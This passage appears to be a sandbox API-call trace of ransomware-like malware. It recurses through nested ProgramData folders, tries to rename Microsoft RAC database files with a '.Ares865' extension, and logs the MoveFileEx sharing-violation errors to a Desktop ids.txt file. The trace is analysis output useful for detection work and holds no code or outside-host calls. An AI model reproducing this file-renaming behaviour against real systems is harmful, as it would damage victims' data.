ftLastAccessTime.dwHighDateTime=0x1cb8927, ftLastWriteTime.dwLowDateTime=0xbddddec0, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RacMetaData.dat", cAlternateFileName="RACMET~1.DAT")) returned 1 [0079.468] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Documents and Settings\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.Ares865") returned 175 [0079.468] MoveFileExW (lpExistingFileName="C:\\Documents and Settings\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf" (normalized: "c:\\documents and settings\\all users\\application data\\application data\\application data\\application data\\application data\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf"), lpNewFileName="C:\\Documents and Settings\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.Ares865" (normalized: "c:\\documents and settings\\all users\\application data\\application data\\application data\\application data\\application data\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf.ares865"), dwFlags=0x1) returned 0 [0079.469] GetLastError () returned 0x20 [0079.469] wsprintfA (in: param_1=0x2e2dc38, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Documents and Settings\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf MoveFileEx error 32\r\n") returned 197 [0079.469] lstrlenA (lpString="[ERROR] C:\\Documents and Settings\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf MoveFileEx error 32\r\n") returned 197 [0079.469] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0079.469] SetFilePointer (in: hFile=0x12c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x3607 [0079.469] WriteFile (in: hFile=0x12c, lpBuffer=0x2e2dc38*, nNumberOfBytesToWrite=0xc5, lpNumberOfBytesWritten=0x2e2d5d4, lpOverlapped=0x0 | out: lpBuffer=0x2e2dc38*, lpNumberOfBytesWritten=0x2e2d5d4*=0xc5, lpOverlapped=0x0) returned 1 [0079.469] CloseHandle (hObject=0x12c) returned 1 [0079.469] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0079.469] CloseHandle (hObject=0x0) returned 0 [0079.469] CloseHandle (hObject=0x0) returned 0 [0079.469] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xece09220, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x36e8f0a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5d2bec40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x25000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RacWmiDatabase.sdf", cAlternateFileName="RACWMI~1.SDF")) returned 0 [0079.469] FindClose (in: hFindFile=0x2ccda8 | out: hFindFile=0x2ccda8) returned 1 [0079.469] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d2408 [0079.514] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Documents and Settings\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.Ares865") returned 185 [0079.514] MoveFileExW (lpExistingFileName="C:\\Documents and Settings\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf" (normalized: "c:\\documents and settings\\all users\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\rac\\statedata\\racdatabase.sdf"), lpNewFileName="C:\\Documents and Settings\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.Ares865" (normalized: "c:\\documents and settings\\all users\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\rac\\statedata\\racdatabase.sdf.ares865"), dwFlags=0x1) returned 0 [0079.514] GetLastError () returned 0x20 [0079.514] wsprintfA (in: param_1=0x2e2dc38, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Documents and Settings\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf MoveFileEx error 32\r\n") returned 207 [0079.514] lstrlenA (lpString="[ERROR] C:\\Documents and Settings\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf MoveFileEx error 32\r\n") returned 207 [0079.514] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0079.514] SetFilePointer (in: hFile=0x12c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x36cc [0079.514] WriteFile (in: hFile=0x12c, lpBuffer=0x2e2dc38*, nNumberOfBytesToWrite=0xcf, lpNumberOfBytesWritten=0x2e2d5d4, lpOverlapped=0x0 | out: lpBuffer=0x2e2dc38*, lpNumberOfBytesWritten=0x2e2d5d4*=0xcf, lpOverlapped=0x0) returned 1 [0079.514] CloseHandle (hObject=0x12c) returned 1 [0079.515] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0079.515] CloseHandle (hObject=0x0) returned 0 [0079.515] CloseHandle (hObject=0x0) returned 0 [0079.515] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4e1e72ec, ftCreationTime.dwHighDateTime=0x1cb8927, ftLastAccessTime.dwLowDateTime=0x4e1e72ec, ftLastAccessTime.dwHighDateTime=0x1cb8927, ftLastWriteTime.dwLowDateTime=0xbddddec0, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RacMetaData.dat", cAlternateFileName="RACMET~1.DAT")) returned 1 [0079.515] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Documents and Settings\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.Ares865") returned 192 [0079.515] MoveFileExW (lpExistingFileName="C:\\Documents and Settings\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf" (normalized: "c:\\documents and settings\\all users\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf"), lpNewFileName="C:\\Documents and Settings\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.Ares865" (normalized: "c:\\documents and settings\\all users\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf.ares865"), dwFlags=0x1) returned 0 [0079.515] GetLastError () returned 0x20 [0079.515] wsprintfA (in: param_1=0x2e2dc38, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Documents and Settings\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf MoveFileEx error 32\r\n") returned 214 [0079.515] lstrlenA (lpString="[ERROR] C:\\Documents and Settings\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf MoveFileEx error 32\r\n") returned 214 [0079.516] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0079.516] SetFilePointer (in: hFile=0x12c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x379b [0079.516] WriteFile (in: hFile=0x12c, lpBuffer=0x2e2dc38*, nNumberOfBytesToWrite=0xd6, lpNumberOfBytesWritten=0x2e2d5d4, lpOverlapped=0x0 | out: lpBuffer=0x2e2dc38*, lpNumberOfBytesWritten=0x2e2d5d4*=0xd6, lpOverlapped=0x0) returned 1 [0079.516] CloseHandle (hObject=0x12c) returned 1 [0079.516] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0079.516] CloseHandle (hObject=0x0) returned 0 [0079.516] CloseHandle (hObject=0x0) returned 0 [0079.516] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xece09220, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x36e8f0a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5d2bec40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x25000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RacWmiDatabase.sdf", cAlternateFileName="RACWMI~1.SDF")) returned 0 [0079.516] FindClose (in: hFindFile=0x2ccda8 | out: hFindFile=0x2ccda8) returned 1 [0079.516] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d2428 [0079.556] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Documents and Settings\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.Ares865") returned 202 [0079.556] MoveFileExW (lpExistingFileName="C:\\Documents and Settings\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf" (normalized: "c:\\documents and settings\\all users\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\rac\\statedata\\racdatabase.sdf"), lpNewFileName="C:\\Documents and Settings\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.Ares865" (normalized: "c:\\documents and settings\\all users\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\rac\\statedata\\racdatabase.sdf.ares865"), dwFlags=0x1) returned 0 [0079.556] GetLastError () returned 0x20 [0079.556] wsprintfA (in: param_1=0x2e2dc38, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Documents and Settings\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf MoveFileEx error 32\r\n") returned 224 [0079.556] lstrlenA (lpString="[ERROR] C:\\Documents and Settings\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf MoveFileEx error 32\r\n") returned 224 [0079.556] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0079.556] SetFilePointer (in: hFile=0x12c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x3871 [0079.556] WriteFile (in: hFile=0x12c, lpBuffer=0x2e2dc38*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2e2d5d4, lpOverlapped=0x0 | out: lpBuffer=0x2e2dc38*, lpNumberOfBytesWritten=0x2e2d5d4*=0xe0, lpOverlapped=0x0) returned 1 [0079.564] CloseHandle (hObject=0x12c) returned 1 [0079.564] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0079.564] CloseHandle (hObject=0x0) returned 0 [0079.564] CloseHandle (hObject=0x0) returned 0 [0079.564] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4e1e72ec, ftCreationTime.dwHighDateTime=0x1cb8927, ftLastAccessTime.dwLowDateTime=0x4e1e72ec, ftLastAccessTime.dwHighDateTime=0x1cb8927, ftLastWriteTime.dwLowDateTime=0xbddddec0, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RacMetaData.dat", cAlternateFileName="RACMET~1.DAT")) returned 1 [0079.565] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Documents and Settings\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.Ares865") returned 209 [0079.565] MoveFileExW (lpExistingFileName="C:\\Documents and Settings\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf" (normalized: "c:\\documents and settings\\all users\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf"), lpNewFileName="C:\\Documents and Settings\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.Ares865" (normalized: "c:\\documents and settings\\all users\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf.ares865"), dwFlags=0x1) returned 0 [0079.565] GetLastError () returned 0x20 [0079.565] wsprintfA (in: param_1=0x2e2dc38, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Documents and Settings\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf MoveFileEx error 32\r\n") returned 231 [0079.565] lstrlenA (lpString="[ERROR] C:\\Documents and Settings\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf MoveFileEx error 32\r\n") returned 231 [0079.565] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0079.566] SetFilePointer (in: hFile=0x12c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x3951 [0079.566] WriteFile (in: hFile=0x12c, lpBuffer=0x2e2dc38*, nNumberOfBytesToWrite=0xe7, lpNumberOfBytesWritten=0x2e2d5d4, lpOverlapped=0x0 | out: lpBuffer=0x2e2dc38*, lpNumberOfBytesWritten=0x2e2d5d4*=0xe7, lpOverlapped=0x0) returned 1 [0079.566] CloseHandle (hObject=0x12c) returned 1 [0079.566] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0079.566] CloseHandle (hObject=0x0) returned 0 [0079.566] CloseHandle (hObject=0x0) returned 0 [0079.566] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xece09220, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x36e8f0a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5d2bec40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x25000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RacWmiDatabase.sdf", cAlternateFileName="RACWMI~1.SDF")) returned 0 [0079.566] FindClose (in: hFindFile=0x2ccda8 | out: hFindFile=0x2ccda8) returned 1 [0079.566] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d2448 [0079.606] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Documents and Settings\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.Ares865") returned 219 [0079.606] MoveFileExW (lpExistingFileName="C:\\Documents and Settings\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf" (normalized: "c:\\documents and settings\\all users\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\rac\\statedata\\racdatabase.sdf"), lpNewFileName="C:\\Documents and Settings\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.Ares865" (normalized: "c:\\documents and settings\\all users\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\rac\\statedata\\racdatabase.sdf.ares865"), dwFlags=0x1) returned 0 [0079.606] GetLastError () returned 0x20 [0079.606] wsprintfA (in: param_1=0x2e2dc38, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Documents and Settings\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf MoveFileEx error 32\r\n") returned 241 [0079.606] lstrlenA (lpString="[ERROR] C:\\Documents and Settings\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf MoveFileEx error 32\r\n") returned 241 [0079.606] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0079.606] SetFilePointer (in: hFile=0x12c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x3a38 [0079.606] WriteFile (in: hFile=0x12c, lpBuffer=0x2e2dc38*, nNumberOfBytesToWrite=0xf1, lpNumberOfBytesWritten=0x2e2d5d4, lpOverlapped=0x0 | out: lpBuffer=0x2e2dc38*, lpNumberOfBytesWritten=0x2e2d5d4*=0xf1, lpOverlapped=0x0) returned 1 [0079.607] CloseHandle (hObject=0x12c) returned 1 [0079.607] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0079.607] CloseHandle (hObject=0x0) returned 0 [0079.607] CloseHandle (hObject=0x0) returned 0 [0079.607] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4e1e72ec, ftCreationTime.dwHighDateTime=0x1cb8927, ftLastAccessTime.dwLowDateTime=0x4e1e72ec, ftLastAccessTime.dwHighDateTime=0x1cb8927, ftLastWriteTime.dwLowDateTime=0xbddddec0, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RacMetaData.dat", cAlternateFileName="RACMET~1.DAT")) returned 1 [0079.607] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Documents and Settings\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.Ares865") returned 226 [0079.607] MoveFileExW (lpExistingFileName="C:\\Documents and Settings\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf" (normalized: "c:\\documents and settings\\all users\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf"), lpNewFileName="C:\\Documents and Settings\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.Ares865" (normalized: "c:\\documents and settings\\all users\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf.ares865"), dwFlags=0x1) returned 0 [0079.608] GetLastError () returned 0x20 [0079.608] wsprintfA (in: param_1=0x2e2dc38, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Documents and Settings\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf MoveFileEx error 32\r\n") returned 248 [0079.608] lstrlenA (lpString="[ERROR] C:\\Documents and Settings\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf MoveFileEx error 32\r\n") returned 248 [0079.608] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0079.608] SetFilePointer (in: hFile=0x12c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x3b29 [0079.608] WriteFile (in: hFile=0x12c, lpBuffer=0x2e2dc38*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0x2e2d5d4, lpOverlapped=0x0 | out: lpBuffer=0x2e2dc38*, lpNumberOfBytesWritten=0x2e2d5d4*=0xf8, lpOverlapped=0x0) returned 1 [0079.608] CloseHandle (hObject=0x12c) returned 1 [0079.608] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0079.608] CloseHandle (hObject=0x0) returned 0 [0079.608] CloseHandle (hObject=0x0) returned 0 [0079.608] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xece09220, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x36e8f0a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5d2bec40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x25000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RacWmiDatabase.sdf", cAlternateFileName="RACWMI~1.SDF")) returned 0 [0079.608] FindClose (in: hFindFile=0x2ccda8 | out: hFindFile=0x2ccda8) returned 1 [0079.608] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d2528 [0079.638] wsprintfA (in: param_1=0x2e2f028, param_2="[ERROR] %S FindFirstFile error %i\r\n" | out: param_1="[ERROR] C:\\Documents and Settings\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\* FindFirstFile error 3\r\n") returned 292 [0079.638] lstrlenA (lpString="[ERROR] C:\\Documents and Settings\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\* FindFirstFile error 3\r\n") returned 292 [0079.638] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0079.638] SetFilePointer (in: hFile=0xa4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x3c21 [0079.638] WriteFile (in: hFile=0xa4, lpBuffer=0x2e2f028*, nNumberOfBytesToWrite=0x124, lpNumberOfBytesWritten=0x2e2e514, lpOverlapped=0x0 | out: lpBuffer=0x2e2f028*, lpNumberOfBytesWritten=0x2e2e514*=0x124, lpOverlapped=0x0) returned 1 [0079.638] CloseHandle (hObject=0xa4) returned 1 [0079.638] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d2388 [0079.649] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Documents and Settings\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.Ares865") returned 236 [0079.649] MoveFileExW (lpExistingFileName="C:\\Documents and Settings\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf" (normalized: "c:\\documents and settings\\all users\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\rac\\statedata\\racdatabase.sdf"), lpNewFileName="C:\\Documents and Settings\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.Ares865" (normalized: "c:\\documents and settings\\all users\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\rac\\statedata\\racdatabase.sdf.ares865"), dwFlags=0x1) returned 0 [0079.649] GetLastError () returned 0x20 [0079.649] wsprintfA (in: param_1=0x2e2dc38, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Documents and Settings\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf MoveFileEx error 32\r\n") returned 258 [0079.649] lstrlenA (lpString="[ERROR] C:\\Documents and Settings\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf MoveFileEx error 32\r\n") returned 258 [0079.649] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0079.649] SetFilePointer (in: 